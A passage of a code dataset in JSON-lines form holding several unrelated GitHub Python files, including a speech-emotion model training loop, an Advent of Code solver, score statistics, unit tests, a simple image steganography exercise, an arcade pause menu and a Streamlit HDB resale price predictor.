trainable=True)\n\tout_params = output_params+out.get_params()\n\tmw_params = output_params+mw.get_params()\n\tparams = output_params+mw.get_params()+ 
out.get_params()\n\t\n\tupdates_mw= lasagne.updates.adadelta(mw_loss, mw_params)\n\tupdates_class= lasagne.updates.adadelta(loss, out_params)\n\tupdates = lasagne.updates.adadelta(total_loss, params)\n\n\tout_predictions_deterministic,mw_predictions_deterministic=get_output([out,mw], deterministic=True)\n\t\n\ttrain_fn=theano.function([x,m,y,g],total_loss,updates=updates)\n\ttrain_mw_fn=theano.function([x,m,g],mw_loss,updates=updates_mw)\n\ttrain_class_fn=theano.function([x,m,y],loss,updates=updates_class)\n\t\n\tmw_acc=binary_accuracy(mw_predictions_deterministic,g)\n\tmw_acc=aggregate(mw_acc,mode='mean')\n\t\n\tclass_acc=categorical_accuracy(out_predictions_deterministic,y)\n\tclass_acc=aggregate(class_acc,mode='mean')\n\t\n\ttest_class_fn=theano.function([x,m,y],class_acc)\n\ttest_mw_fn=theano.function([x,m,g],mw_acc)\n\t\n\treturn train_fn, train_mw_fn,train_class_fn, test_class_fn,test_mw_fn,params\n\t\n\t\ntrain_fn, train_mw_fn,train_class_fn, test_class_fn,test_mw_fn,params=model_build()\nfrom new import datagenerate\ndatagene=datagenerate(portion2train=0.8)\n##################### params setting ######################\nuidx =0\nmax_epochs=50\ncost_list=[]\nerror_list=[]\npatient=10\nlrate=0.0001\nbad_counter = 0\nestop=False\nload_params=False\nif load_params:\n\tparams.load()\n#####################################################\nfor eidx in range(max_epochs):\n\tfor (x,mask),y,g in datagene.train_iterate():\n\t\tuidx+=1\n\t\tcost= train_fn(x,mask,y,g)\n\t\tcost_list.append(cost)\n\t\tif np.mod(uidx,10)==0:\n\t\t\tprint(\"%d update,cost:%.4f\" % (uidx,cost))\n\t\tif np.mod(uidx,100)==0:\n\t\t\tsum=0\n\t\t\tnum=0\n\t\t\tfor (x,m),y,g in datagene.test_iterate():\n\t\t\t\tsum+=test_class_fn(x,m,y)*len(y)\n\t\t\t\tnum+=len(y)\n\t\t\trr=sum/float(num)\n\t\t\terror_list.append(rr)\n\t\t\tprint(\"recognition rate:%.4f\"%rr)\n\t\t\t#print(error_list)\n\t\t\tif len(error_list)!=1 and rr > np.array(error_list[:-1]).max():\n\t\t\t\tbad_counter=0\n\t\t\t\tprint('save the parameter!')\n\t\t\t\tnp.savez('net_params',params)#params.save()\n\t\t\tif len(error_list)>patient and rr<= np.array(error_list)[-patient:].max():\n\t\t\t\tbad_counter+=1\n\t\t\t\tif bad_counter > patient:\n\t\t\t\t\tprint(\"Early stop\")\n\t\t\t\t\testop=True\n\t\t\t\t\tbreak\n\tif estop==True:\n\t\tbreak\nprint(\"best recognition rate %.4f\"%np.array(error_list).max())","repo_name":"stevexiaofei/Speech-emotion-recognition","sub_path":"emorec.py","file_name":"emorec.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"35372223015","text":"prix=float(input('entrez le prix hors taxes :'))\r\ntva = 18.6\r\nremise=0\r\nif 1000<=prix<2000 :\r\n    print(\"Prix HT sans réduction : \", prix, \"€\")\r\n    print(\"Taux de réduction : 1 %\")\r\n    remise=0.01\r\nelif 2000<=prix<5000 :\r\n    print(\"Prix HT sans réduction : \", prix, \"€\")\r\n    print(\"Taux de réduction : 3 %\")\r\n    remise=0.03\r\nelif prix>=5000 :\r\n    print(\"Prix HT sans réduction : \", prix , \"€\")\r\n    print(\"Taux de réduction : 5 %\")\r\n    remise=0.05\r\n\r\nnouveauprix = prix * (1 - remise)\r\nTTC= nouveauprix*(1+tva/100)\r\nprint(\"Prix TTC avec réduction : \", TTC, \"€\")","repo_name":"Chaima-LGDOUR/tp-python","sub_path":"pycharm/Exo3.py","file_name":"Exo3.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} 
+{"seq_id":"74605329061","text":"\"\"\"AoC 2015.09 problem solver.\n\nTakes input from STDIN by default.\n\n(c) Alexander Kashev, 2017\n\"\"\"\nimport sys\nfrom math import factorial\nimport re\n\n\ndef permute(list, index):\n \"\"\"\n Return index-th permutation of a list.\n\n Keyword arguments:\n list --- the list to be permuted\n index --- index in range (0, factorial(len(list)))\n \"\"\"\n if len(list) < 2:\n return list\n (rest, choice) = divmod(index, len(list))\n return [list[choice]] + permute(list[0:choice] + list[choice + 1:len(list)], rest)\n\n\ndef distance(route, graph):\n \"\"\"\n Calculate total distance for a given route through a graph.\n\n Keyword arguments:\n route --- a list of node names that form the route\n graph --- a dictionary mapping node name pairs to distance\n \"\"\"\n length = 0\n for i in range(1, len(route)):\n length += graph[(route[i - 1], route[i])]\n return length\n\n\ndef solver(file):\n \"\"\"\n Take a file object with input and solve AoC 2015.09 problem on the input.\n\n Keyword arguments:\n file --- a file object to read input from\n \"\"\"\n graph = {}\n places = set()\n for line in file:\n (start, end, length) = re.match(r\"(\\w+) to (\\w+) = (\\d+)\", line).groups()\n places.add(start)\n places.add(end)\n graph[(start, end)] = int(length)\n graph[(end, start)] = int(length)\n\n places = list(places)\n\n min_length = 100000000\n max_length = 0\n min_route = []\n max_route = []\n for route in [permute(places, index) for index in range(0, factorial(len(places)))]:\n length = distance(route, graph)\n if min_length > length:\n min_length = length\n min_route = route\n if max_length < length:\n max_length = length\n max_route = route\n\n return ((min_length, \"->\".join(min_route)), (max_length, \"->\".join(max_route)))\n\n\nif __name__ == \"__main__\":\n solution = solver(sys.stdin)\n\n print(\"Part A: The length of minimal route {1} is {0}.\".format(*solution[0]))\n print(\"Part B: The length of maximal route {1} is {0}.\".format(*solution[1]))\n","repo_name":"kav2k/AoC","sub_path":"2015/09/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19104778883","text":"import pandas as pd\nimport statistics as st\nimport plotly.figure_factory as ff\n\ndf = pd.read_csv(\"StudentsPerformance.csv\")\n\nmathsScore = df[\"math score\"].tolist()\nreadingScore = df[\"reading score\"].tolist()\nwritingScore = df[\"writing score\"].tolist()\n\n\ndef Mean_Median_Mode():\n # Mean\n mathsMean = st.mean(mathsScore)\n readingMean = st.mean(readingScore)\n writingMean = st.mean(writingScore)\n\n\n # Median\n mathsMedian = st.median(mathsScore)\n readingMedian = st.median(readingScore)\n writingMedian = st.median(writingScore)\n\n\n # Mode\n mathsMode = st.mode(mathsScore)\n readingMode = st.mode(readingScore)\n writingMode = st.mode(writingScore)\n\n\n # Standerd Diviation\n mathsStd = st.stdev(mathsScore)\n readingStd = st.stdev(readingScore)\n writingStd = st.stdev(writingScore)\n\n\n print('\\n Mean of Maths Score: ', mathsMean, '\\n', 'Mean of Reading Score: ',\n readingMean, '\\n', 'Mean of Writing Score: ', writingMean)\n\n print('\\n Median of Maths Score: ', mathsMedian, '\\n', 'Median of Reading Score: ',\n readingMedian, '\\n', 'Median of Writing Score: ', writingMedian)\n\n print('\\n Mode of Maths Score: ', mathsMode, '\\n', 'Mode of Reading Score: ',\n readingMode, '\\n', 'Mode of Writing Score: ', writingMode)\n\n print('\\n 
Standard deviation of Maths Score: ', mathsStd, '\\n', 'Standard deviation of Reading Score: ',\n          readingStd, '\\n', 'Standard deviation of Writing Score: ', writingStd)\n\n\n\n\n    # Maths\n\n    sd1_Start, sd1_End = mathsMean - mathsStd, mathsMean + mathsStd\n    sd2_Start, sd2_End = mathsMean - (2* mathsStd), mathsMean + (2* mathsStd)\n    sd3_Start, sd3_End = mathsMean - (3* mathsStd), mathsMean + (3* mathsStd)\n\n    M_counterStd1 = 0\n    M_counterStd2 = 0\n    M_counterStd3 = 0\n\n    for i in range(0, len(mathsScore)):\n        value = mathsScore[i]\n        if value >= sd1_Start and value <= sd1_End:\n            M_counterStd1 += 1\n\n        if value >= sd2_Start and value <= sd2_End:\n            M_counterStd2 += 1\n\n        if value >= sd3_Start and value <= sd3_End:\n            M_counterStd3 += 1\n\n\n    M_perOfSd1 = (M_counterStd1*100)/len(mathsScore)\n    M_perOfSd2 = (M_counterStd2*100)/len(mathsScore)\n    M_perOfSd3 = (M_counterStd3*100)/len(mathsScore)\n\n    print('\\n Maths Std1: ',M_perOfSd1)\n    print(' Maths Std2: ',M_perOfSd2)\n    print(' Maths Std3: ',M_perOfSd3)\n\n\n\n    # Reading Score\n\n    sd1_Start, sd1_End = readingMean - readingStd, readingMean + readingStd\n    sd2_Start, sd2_End = readingMean - (2* readingStd), readingMean + (2* readingStd)\n    sd3_Start, sd3_End = readingMean - (3* readingStd), readingMean + (3* readingStd)\n\n    R_counterStd1 = 0\n    R_counterStd2 = 0\n    R_counterStd3 = 0\n\n    for i in range(0, len(readingScore)):\n        value = readingScore[i]\n        if value >= sd1_Start and value <= sd1_End:\n            R_counterStd1 += 1\n\n        if value >= sd2_Start and value <= sd2_End:\n            R_counterStd2 += 1\n\n        if value >= sd3_Start and value <= sd3_End:\n            R_counterStd3 += 1\n\n    R_perOfSd1 = (R_counterStd1*100)/len(readingScore)\n    R_perOfSd2 = (R_counterStd2*100)/len(readingScore)\n    R_perOfSd3 = (R_counterStd3*100)/len(readingScore)\n\n    print('\\n Reading Std1: ',R_perOfSd1)\n    print(' Reading Std2: ',R_perOfSd2)\n    print(' Reading Std3: ',R_perOfSd3)\n\n\n\n\n    # Writing Score\n\n    sd1_Start, sd1_End = writingMean - writingStd, writingMean + writingStd\n    sd2_Start, sd2_End = writingMean - (2* writingStd), writingMean + (2* writingStd)\n    sd3_Start, sd3_End = writingMean - (3* writingStd), writingMean + (3* writingStd)\n\n    W_counterStd1 = 0\n    W_counterStd2 = 0\n    W_counterStd3 = 0\n\n    for i in range(0, len(writingScore)):\n        value = writingScore[i]\n        if value >= sd1_Start and value <= sd1_End:\n            W_counterStd1 += 1\n\n        if value >= sd2_Start and value <= sd2_End:\n            W_counterStd2 += 1\n\n        if value >= sd3_Start and value <= sd3_End:\n            W_counterStd3 += 1\n\n    W_perOfSd1 = (W_counterStd1*100)/len(writingScore)\n    W_perOfSd2 = (W_counterStd2*100)/len(writingScore)\n    W_perOfSd3 = (W_counterStd3*100)/len(writingScore)\n\n    print('\\n Writing Std1: ',W_perOfSd1)\n    print(' Writing Std2: ',W_perOfSd2)\n    print(' Writing Std3: ',W_perOfSd3)\n\n\n\nMean_Median_Mode()\n\ninput(\"\\n\\nPlease Press Enter to Load the Graph\")\n\ngraph1 = ff.create_distplot([mathsScore, readingScore, writingScore], [\n    'Maths Score', 'ReadingScore', 'WritingScore'], show_hist=False)\ngraph1.show()\n","repo_name":"Anchitlahkar/Normal-Distribution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42258964683","text":"import unittest\n\nimport numpy as np\nfrom parameterized import parameterized\nimport jax.numpy as jnp\nimport chex\n\nimport ymir\n\n\nclass TestDistributions(unittest.TestCase):\n\n    def setUp(self):\n        self.rng = np.random.default_rng(0)\n        self.X = self.rng.random((50, 
1))\n self.y = np.sin(self.X).round().reshape(-1)\n\n @parameterized.expand([(nclients, ) for nclients in range(1, 10)])\n def test_homogeneous(self, nclients):\n dist = ymir.utils.distributions.homogeneous(self.y, nclients, 2, self.rng)\n self.assertEqual(len(dist), nclients)\n for d in dist:\n np.testing.assert_allclose(np.unique(self.y[d]), np.unique(self.y))\n\n @parameterized.expand([(nclients, ) for nclients in range(1, 10)])\n def test_extreme_heterogeneous(self, nclients):\n dist = ymir.utils.distributions.extreme_heterogeneous(self.y, nclients, 2, self.rng)\n self.assertEqual(len(dist), nclients)\n for i, d in enumerate(dist):\n self.assertEqual(np.unique(self.y[d]), i % 2)\n\n @parameterized.expand([(nclients, ) for nclients in range(1, 5)])\n def test_lda(self, nclients):\n dist = ymir.utils.distributions.lda(self.y, nclients, 2, self.rng)\n self.assertEqual(len(dist), nclients)\n for d in dist:\n np.testing.assert_allclose(np.unique(self.y[d]), np.unique(self.y))\n\n def test_iid_partition(self):\n dist = ymir.utils.distributions.iid_partition(self.y, 2, 2, self.rng)\n self.assertEqual(len(dist), 2)\n for d in dist:\n np.testing.assert_allclose(np.unique(self.y[d]), np.unique(self.y))\n\n def test_shard(self):\n dist = ymir.utils.distributions.shard(self.y, 2, 2, self.rng)\n self.assertEqual(len(dist), 2)\n for d in dist:\n np.testing.assert_allclose(np.unique(self.y[d]), np.unique(self.y))\n\n def test_assign_classes(self):\n dist = ymir.utils.distributions.assign_classes(self.y, 2, 2, self.rng, classes=[0, 1])\n self.assertEqual(len(dist), 2)\n for i, d in enumerate(dist):\n np.testing.assert_allclose(np.unique(self.y[d]), i)\n\n\nclass Client:\n\n def step(self, weights, return_weights=False):\n return 0.0, weights, 2\n\n def analytics(self):\n return [0.3, 0.4]\n\n\nclass TestNetwork(unittest.TestCase):\n\n def setUp(self):\n self.network = ymir.utils.network.Network()\n self.clients = [Client() for _ in range(10)]\n\n def test_member_variables(self):\n self.assertEqual(self.network.clients, [])\n self.assertEqual(self.network.C, 1.0)\n self.assertEqual(self.network.K, 0)\n\n def test_len(self):\n self.assertEqual(len(self.network), 0)\n self.network.add_client(self.clients[0])\n self.assertEqual(len(self.network), 1)\n self.network = ymir.utils.network.Network()\n\n def test_add_client(self):\n self.network.add_client(self.clients[0])\n self.assertEqual(self.network.clients[0], self.clients[0])\n self.network = ymir.utils.network.Network()\n\n def test_call(self):\n for client in self.clients:\n self.network.add_client(client)\n losses, weights, data = self.network(1.0)\n np.testing.assert_array_equal(losses, np.repeat(0.0, len(self.clients)))\n np.testing.assert_array_equal(weights, np.repeat(1.0, len(self.clients)))\n np.testing.assert_array_equal(data, np.repeat(2, len(self.clients)))\n\n def test_analytics(self):\n for client in self.clients:\n self.network.add_client(client)\n np.testing.assert_array_equal(self.network.analytics(), [[0.3, 0.4]] * len(self.clients))\n\n\n@chex.dataclass\nclass Params:\n \"\"\"\n Parameter trees for testing.\n \"\"\"\n w: chex.ArrayDevice\n b: chex.ArrayDevice\n\n\nclass TestFunctions(unittest.TestCase):\n def test_ravel(self):\n ravelled_params = ymir.utils.functions.ravel(Params(w=jnp.array([1, 1]), b=jnp.array([1])))\n np.testing.assert_array_equal(jnp.array([1, 1, 1]), ravelled_params)\n \n def test_gradient(self):\n a = Params(w=jnp.array([3, 3]), b=jnp.array([3]))\n b = Params(w=jnp.array([1, 2]), b=jnp.array([3]))\n grad = 
ymir.utils.functions.gradient(a, b)\n        np.testing.assert_array_equal(np.array([0, 2, 1]), grad)\n\n    def test_scale_sum(self):\n        ss = ymir.utils.functions.scale_sum(jnp.array([[1, 1], [0, 0], [2, 3]]), jnp.array([0.1, 3, 5]))\n        np.testing.assert_array_equal(jnp.array([10.1, 15.1], dtype=jnp.float32), ss)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"codymlewis/ymir","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"11068452309","text":"import io\nimport os\n\nfrom setuptools import setup, find_packages\n\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# Avoids IDE errors, but actual version is read from VERSION\n__version__ = None\nexec(open('VERSION').read())\n\nshort_description = 'Text pair classification toolkit.'\n\n# Get the long description from the README file\nwith io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:\n    long_description = f.read()\n\ninstall_requires = [\n    'numpy >= 1.14',\n    'tqdm >= 4.19.4',\n    'pandas >= 0.23.1',\n    'torch >= 1.0',\n    'spacy >= 2.0'\n]\n\n\nsetup(\n    name=\"Lion\",\n    version=__version__,\n    author=\"Lixin Su, Xinyu Ma, etc\",\n    author_email=\"\",\n    description=(short_description),\n    license=\"Apache 2.0\",\n    keywords=\"text pair classification toolkit\",\n    url=\"\",\n    packages=find_packages(),\n    long_description=long_description,\n    long_description_content_type='text/markdown',\n    classifiers=[\n        \"Development Status :: 3 - Alpha\",\n        'Environment :: Console',\n        'Operating System :: POSIX :: Linux',\n        'Topic :: Scientific/Engineering :: Artificial Intelligence',\n        \"License :: OSI Approved :: Apache Software License\",\n        'Programming Language :: Python :: 3.6'\n    ],\n    install_requires=install_requires,\n)\n","repo_name":"lixinsu/Lion","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"35"} +{"seq_id":"29427435997","text":"from django.shortcuts import render_to_response\nfrom black_board.models import ReportGetter\nimport models\nimport config\n\ndef genPics(pic_names):\n\n    import subprocess\n    from os.path import dirname, join, normpath, realpath, isfile\n\n    pics_path = dirname(realpath(__file__))\n    pics_path = normpath(join(pics_path, '..', 'templates', 'pics'))\n\n    for pic in pic_names:\n        if not isfile(join(pics_path, pic + '.png')):\n            subprocess.call(['perl','png_gen.pl',pic],cwd=pics_path)\n\n\ndef index(request, timestamp=None, branch=None):\n\n    results, modules, runs, branches, timestamp, branch = ReportGetter.get(timestamp, branch)\n    modules.sort()\n    top_header = [\"Platform\", \"Compiler\", \"Config\"]\n\n    genPics(modules + top_header)\n    response = render_to_response(\"black_board.html\", {\n        'headers' : modules,\n        'results' : results,\n        'top_header' : top_header,\n        'runs' : runs,\n        'timestamp' : timestamp,\n        'branches' : branches,\n        'branch' : branch\n    })\n\n    return response\n\n","repo_name":"maskedbaby-ch/wav-sai","sub_path":"MAPS-K64/MAPS-K64_1.0.0/rtos/mqx/tests/autofrm/utils/board/web_interface/black_board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8786347680","text":"#Steganography\r\n\r\nimport cv2 # pip install opencv-python\r\n\r\ndef spiltbyte(by): #011 000 01\r\n    
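# split one byte into its top 3 bits, middle 3 bits and bottom 2 bits (MSB first)\r\n    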
first_three_bits = by >> 5\r\n    mid_three_bits = (by >> 2) & 7\r\n    last_two_bits = by & 3\r\n    return first_three_bits, mid_three_bits, last_two_bits\r\n\r\ndef merge_bits(bits): #[3,0, 1] => 97\r\n    # result = bits[0] <<3 #make room for 3 bits at the RHS\r\n    # result = result | bits[1] #merge the mid 3 bits\r\n    # result = result << 2 #make room for 2 bits at the RHS\r\n    # result = result | bits[2] #merge the mid 2 bits\r\n\r\n    return (((bits[0]<<3) | bits[1]) << 2) | bits[2]\r\n\r\n\r\ndef embed(vessel_image, target_image):\r\n    #load the vessel_image into memory\r\n    mem_image = cv2.imread(vessel_image)\r\n    print(type(mem_image))\r\n    print(mem_image.shape)\r\n\r\n    #dummy data to embed\r\n    data = [x for x in range(65,91)]\r\n    print(data)\r\n    size = len(data)\r\n    indx = 0\r\n\r\n    #embedding loop\r\n    r =0\r\n    while r < mem_image.shape[0] and indx < size:\r\n        c =0\r\n        while c < mem_image.shape[1] and indx < size:\r\n            bits = spiltbyte(data[indx])\r\n\r\n            #Free 2,3,3 bits of the pixel\r\n            mem_image[r, c, 0] &= 252 #blue band\r\n            mem_image[r, c, 1] &= 248 #green band\r\n            mem_image[r, c, 2] &= 248 #red band\r\n\r\n            #Merge the bits into the bands\r\n            mem_image[r, c, 0] |= bits[2] # blue band\r\n            mem_image[r, c, 1] |= bits[1] # green band\r\n            mem_image[r, c, 2] |= bits[0] # red band\r\n\r\n            #next val to embed\r\n            indx+=1\r\n\r\n            c+=1\r\n        r+=1\r\n\r\n    #save back the image\r\n    cv2.imwrite(target_image, mem_image)\r\n\r\ndef extract(emb_image):\r\n    #load the image in memory\r\n    mem_img = cv2.imread(emb_image)\r\n    #print(mem_img.shape)\r\n    qty_to_extract = 26\r\n    width = mem_img.shape[1]\r\n    indx =0\r\n    buffer = []\r\n    temp = []\r\n    while indx < qty_to_extract:\r\n        r = indx //width\r\n        c = indx % width\r\n        temp.clear()\r\n        for i in range(3): #0,1,2\r\n            temp.append(mem_img[r,c,2-i] & 2 ** (3 - (i+1) // 3) - 1)\r\n\r\n        buffer.append(merge_bits(temp))\r\n        indx+=1\r\n\r\n\r\n    return buffer\r\n\r\ndef main():\r\n    embed('d:/steganography/snake.jpg', 'd:/steganography/new_snake.png')\r\n    buffer = extract('d:/steganography/new_snake.png')\r\n    print(buffer)\r\n\r\nmain()\r\n\r\n\r\n","repo_name":"Aryash1408/Steganography","sub_path":"steganography.py","file_name":"steganography.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41361212028","text":"import arcade\nimport arcade.gui\nfrom constants import *\nfrom game.screens.instruction_screen import InstructionView\n\n# TODO - Figure out how to add restart button\nclass PauseScreen(arcade.View):\n    \"\"\"Pause Screen\n\n    This is the pause screen; it pauses the game.\n\n    Attributes:\n        _background_img: Loads background image for game\n        manager (class): Creates an instance of a UIManager class from arcade\n        game_view (class): Current game state\n        v_box (class): Controls layout of pause menu, instance of UIBoxLayout\n    \"\"\"\n\n    def __init__(self, game_view, sound):\n        \"\"\"Initializes the pause screen\n\n        Args:\n            game_view (game_view): Current state of the game\n        \"\"\"\n        super().__init__()\n        self._background_img = arcade.load_texture(BACKGROUND_IMG)\n        self.manager = arcade.gui.UIManager()\n        self.manager.enable()\n        self.game_view = game_view\n        self.sounds = sound\n        self.v_box = arcade.gui.UIBoxLayout()\n\n        title = arcade.gui.UITextArea(\n            text=\"PAUSED\",\n            width=220,\n            height=75,\n            font_size=30,\n            font_name=TITLE_FONT,\n        )\n\n        self.v_box.add(title.with_space_around(bottom=20))\n\n        resume_button = arcade.gui.UIFlatButton(text=\"Resume\", width=200)\n        
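# stack the menu buttons vertically, with spacing below each one\n        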
self.v_box.add(resume_button.with_space_around(bottom=20))\n\n control_button = arcade.gui.UIFlatButton(text=\"Controls\", width=200)\n self.v_box.add(control_button.with_space_around(bottom=20))\n\n quit_button = arcade.gui.UIFlatButton(text=\"Quit\", width=200)\n self.v_box.add(quit_button.with_space_around(bottom=20))\n\n resume_button.on_click = self.on_resume\n control_button.on_click = self.on_controls\n quit_button.on_click = self.on_quit\n\n self.manager.add(\n arcade.gui.UIAnchorWidget(\n anchor_x=\"center_x\", anchor_y=\"center_y\", child=self.v_box\n )\n )\n\n def on_resume(self, event: arcade.gui.UIOnClickEvent):\n \"\"\"Resumes game\n\n Args:\n event (arcade.gui.UIOnClickEvent): Tracks mouse\n \"\"\"\n self.window.show_view(self.game_view)\n\n def on_controls(self, event: arcade.gui.UIOnClickEvent):\n \"\"\"Shows InstructionView\n\n Args:\n event (arcade.gui.UIOnClickEvent): Tracks mouse\n \"\"\"\n instruction_view = InstructionView()\n instruction_view.setup(self)\n self.window.show_view(instruction_view)\n\n def on_quit(self, event: arcade.gui.UIOnClickEvent):\n \"\"\"Quits the game\n\n Args:\n event (arcade.gui.UIOnClickEvent): Tracks mouse\n \"\"\"\n arcade.exit()\n\n def on_draw(self):\n \"\"\"Draws everything on the screen\"\"\"\n self.clear()\n self.window.set_mouse_visible(True)\n arcade.draw_lrwh_rectangle_textured(\n 0, 0, self.window.width, self.window.height, self._background_img\n )\n game_screen = self.game_view._cast.get_all_actors()\n for item in game_screen:\n item.draw()\n\n self.manager.draw()\n\n def on_key_press(self, key, key_modifiers):\n \"\"\"Keeps track of all keys that are pressed\n\n Args:\n key (int): What key is being pressed\n key_modifiers (int): I think this is also an integer.\n Checks to see if any modifiers like the shift key are being held down.\n \"\"\"\n if key == arcade.key.ESCAPE:\n self.window.show_view(self.game_view)\n","repo_name":"quailninja/LoneSpacer","sub_path":"spacer/game/screens/pause_screen.py","file_name":"pause_screen.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36760811806","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport joblib\nimport requests\nimport os\n\nst.title('Personalised Singapore HDB Resale Price Predictor')\n\nst.subheader(\"By Kenneth Lim\")\nst.write(\"[GitHub](https://github.com/Lzwk16) | [LinkedIn](https://www.linkedin.com/in/lzwk16/)\")\n\nst.markdown('Please input your values')\n\n#input features for predictions\nfloor_area_sqm = st.number_input('Floor Area (SQM)', min_value=30, max_value=300)\nremaining_lease = st.slider('Remaining Years of Lease', min_value=0, max_value=99)\nmid = st.slider('Floor Number', min_value=0, max_value=51)\nmax_floor_lvl = st.slider('Maximum Floor Level', min_value=0, max_value=51)\nflat_type = st.selectbox('Flat Type', ('1 ROOM', '2 ROOM', '3 ROOM', '4 ROOM', '5 ROOM', 'EXECUTIVE', 'MULTI_GENERATION'))\nmrt_nearest_distance = st.number_input('Distance to Nearest MRT Station (metres)', min_value=0, max_value=3544)\ntown = st.selectbox('Estate', ('ANG MO KIO', 'BEDOK', 'BISHAN', 'BUKIT BATOK', 'BUKIT MERAH', 'BUKIT PANJANG', 'BUKIT TIMAH', 'CENTRAL AREA', 'CHOA CHU KANG', \n 'CLEMENTI', 'GEYLANG', 'HOUGANG', 'JURONG EAST', 'JURONG WEST', 'KALLANG/WHAMPOA', 'MARINE PARADE', 'PASIR RIS', 'PUNGGOL', \n 'QUEENSTOWN', 'SEMBAWANG', 'SENGKANG', 'SERANGOON', 'TAMPINES', 'TOA PAYOH', 'WOODLANDS', 'YISHUN'))\nmature_est = ['ANG MO KIO', 'BEDOK', 
'BISHAN', 'BUKIT MERAH', 'BUKIT TIMAH', 'CENTRAL AREA', 'CLEMENTI', \n              'GEYLANG', 'KALLANG/WHAMPOA', 'MARINE PARADE', 'PASIR RIS', 'QUEENSTOWN', 'SERANGOON', \n              'TAMPINES', 'TOA PAYOH']\nif town in mature_est:\n    Mature_Estate = 1\nelse:\n    Mature_Estate = 0\n\nif st.button('Predict'):\n    script_dir = os.path.dirname(os.path.abspath(__file__))\n    model_path = os.path.join(script_dir, 'HDB_model_final.joblib')\n    model = joblib.load(model_path)\n    x = pd.DataFrame([[floor_area_sqm, remaining_lease, mid, max_floor_lvl, flat_type, town, Mature_Estate, mrt_nearest_distance]], \n                     columns=['floor_area_sqm', 'remaining_lease', 'mid', 'max_floor_lvl', 'flat_type', 'town', 'Mature_Estate', 'mrt_nearest_distance'])\n    pred = model.predict(x)[0]\n    st.markdown(f'### Predicted Resale Price of your HDB Flat is ${str(int(round(pred, -3)))}')\n","repo_name":"Lzwk16/project-submissions","sub_path":"project-2/Code/HDB_app.py","file_name":"HDB_app.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"14122142908","text":"'''Write a program that inverts a dictionary, i.e., it makes the keys of one dictionary the values of the other and vice versa\r\nSample Input:\r\nDict={'Reg.No':123, 'Name':'abc', 'Course':'CSE'}\r\nSample Output:\r\nInv Dict={123:'Reg.No', 'abc':'Name', 'CSE':'Course'}'''\r\ndef invert_dict(dictionary):\r\n    inv_dict = {value: key for key, value in dictionary.items()}\r\n    return inv_dict\r\ndict = {'Reg.No': 123, 'Name': 'abc', 'Course': 'CSE'}\r\ninv_dict = invert_dict(dict)\r\nprint(\"Inv Dict =\", inv_dict)\r\n\r\n","repo_name":"VPOOJE/PYTHON","sub_path":"dictionary programs/dict2.py","file_name":"dict2.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"113750110","text":"#!/usr/bin/env python3\n# Trigrams exercise created by Niels Skvarch\n\n# import modules needed to run\nimport random\nimport sys\n\n\n\n# define functions\ndef read_in_data(filename):\n    \"\"\"take in the file of text and create a list of words removing punctuation\"\"\"\n    in_data = list()\n    translate_chars = str.maketrans({\",\" : \" \", \".\" : \" \", \"?\" : \" \", \"!\" : \" \", \";\" : \" \", \"(\" : \" \", \")\" : \" \"})\n    with open(filename, 'r') as f:\n        for line in f:\n\n            if line.isspace():\n                continue\n\n            elif line.find('End of the Project Gutenberg EBook') != -1:\n                break\n\n            else:\n                line = line.translate(translate_chars)\n                line = line.replace('\"', '')\n                line = line.replace('--', ' ')\n                in_data.append(line.lower())\n\n    return in_data\n\n\ndef make_words(in_data):\n    \"\"\"go through the list of words and maintain capitals for the pronoun \"I\" \"\"\"\n    words = list()\n    capitals = ['I', 'I\\'m', 'I\\'ll', 'I\\'ve', 'I\\'d']\n    for line in in_data:\n        words.extend(line.split())\n    for indx, word in enumerate(words):\n        if word.capitalize() in capitals:\n            words[indx] = word.capitalize()\n    return words\n\n\ndef build_trigram(words):\n    \"\"\"\n    build up the trigrams dict from the list of words\n    returns a dict with:\n        keys: word pairs\n        values: list of followers\n    \"\"\"\n    trigrams = {}\n    seeda = random.randint(0, len(words)-2)\n    seedb = seeda + 2\n    seed = words[seeda:seedb]\n    for i in range(len(words)-2):\n        wordpair = words[i:i+2]\n        wordkey = tuple(wordpair)\n        wordval = words[i+2]\n        if wordkey not in trigrams.keys():\n            trigrams[wordkey] = [wordval]\n        else:\n            trigrams[wordkey].append(wordval)\n\n    return trigrams, seed\n\n\ndef 
